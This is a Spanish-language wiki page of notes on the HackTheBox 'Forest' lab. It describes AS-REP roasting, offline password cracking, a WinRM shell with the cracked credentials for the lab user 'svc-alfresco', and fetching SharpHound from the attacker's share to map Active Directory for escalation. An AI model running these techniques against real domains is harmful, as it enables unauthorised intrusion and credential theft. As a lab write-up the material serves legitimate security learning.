Notas de Luis

Haremos los reconocimientos de siempre:

Ya que es una máquina Windows, debemos enumerar con crackmapexec qué máquina es y qué windows tiene instalado, el cual se trata de un Windows Server 2016: Detectar dominio y hostname con crackmapexec

Intentamos listar los recursos compartidos con una null session de esta máquina pero no sale nada:

Lo que podemos hacer es intentar enumerar usuarios válidos haciendo uso de la herramienta enum4linux:

Ahora que tenemos todos estos usuarios, vamos a guardarlos todos en un documento para poder usarlos como ataque de fuerza bruta, esto podemos hacerlo a través de expresiones regulares en bash o copiando y pegando cada usuario:

Y lo guardamos dentro del documento users:

Ahora que tenemos este listado de usuarios, hay una herramienta que se llama GetNPusers de impacket que sirve para obtener Ticket Granting Ticket (TGT) de credenciales de aquellos usuarios que no requieren autenticación Kerberos; por tanto debemos pasarle el dominio y el diccionario con los usuarios, y vemos que nos encuentra un hash de uno de los usuarios:

Ahora guardamos este hash en un documento de texto y con john intentamos deshashearla con un ataque de fuerza bruta utilizando el diccionario rockyou.txt:

Y tras ejecutar este comando, obtenemos una contraseña, la cual es s3rvice:

Ahora con crackmapexec podemos validar si estas credenciales son válidas, las cuales vemos que sí:Comprobar y validar credenciales con crackmapexec

Y con estas credenciales ya podemos listar recursos compartidos y los permisos que tenemos:Listar recursos compartidos con crackmapexec

Y ahora podemos ver si este usuario forma parte del grupo win managament users:

Ahora con toda esta información ya podemos ganar una consola interactiva utilizando las credenciales de este usuario utilizando evil-winrm:

evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Y navegando por los directorios, obtenemos la flag:

Podemos conocer detalles sobre este usuario con el comando net user svc-alfresco:

Ahora para escalar los privilegios podemos utilizar una herramienta llamada bloodhound que nos va a recopilar mucha información acerca del Active Directory de la víctima, por lo que en Kali Linux ya lo tenemos en este directorio:

Y nos lo compartimos con la máquina víctima a través de samba:

Y desde la máquina víctima nos lo recibimos:

copy \\10.10.16.6\recurso\SharpHound.exe SharpHound.exe

Y ahora ejecutamos el SharpHopund.exe y nos habrá generado un archivo zip:

Y ahora para bajarnos este comprimido, ejecutamos el siguiente comando que nos va a permitir descargar archivos desde Evil-WinRM:

download C:\Users\svc-alfresco\Desktop\20231123091422_BloodHound.zip data.zip

Y ahora tenemos que arrancar el neo4j console, que será lo que haga funcionar a bloodhound, por tanto ejecutamos el comando neo4j console

Y a continuación tenemos que acceder al puerto 7687 para establecer unas credenciales y abrir bloodhound:

http://localhost:7474/browser/

Aquí nos autenticamos con las credenciales por defecto las cuales son neo4j y neo4j y al darle a connect nos pedirá configurar unas nuevas credenciales:

A continuación, abrimos la app de bloodhound y nos autenticamos con estas nuevas credenciales:

Y una vez dentro le cargamos toda la data que hemos obtenido anteriormente desde la máquina víctima:

En la parte de arriba ponemos el usuario que hemos comprometido:

Y marcamos como pwned este usuario:

Y se nos muestra todo el mapa del AD:

computing/hacking/ctf/hackthebox/maquina_forest.txt · Última modificación: por 127.0.0.1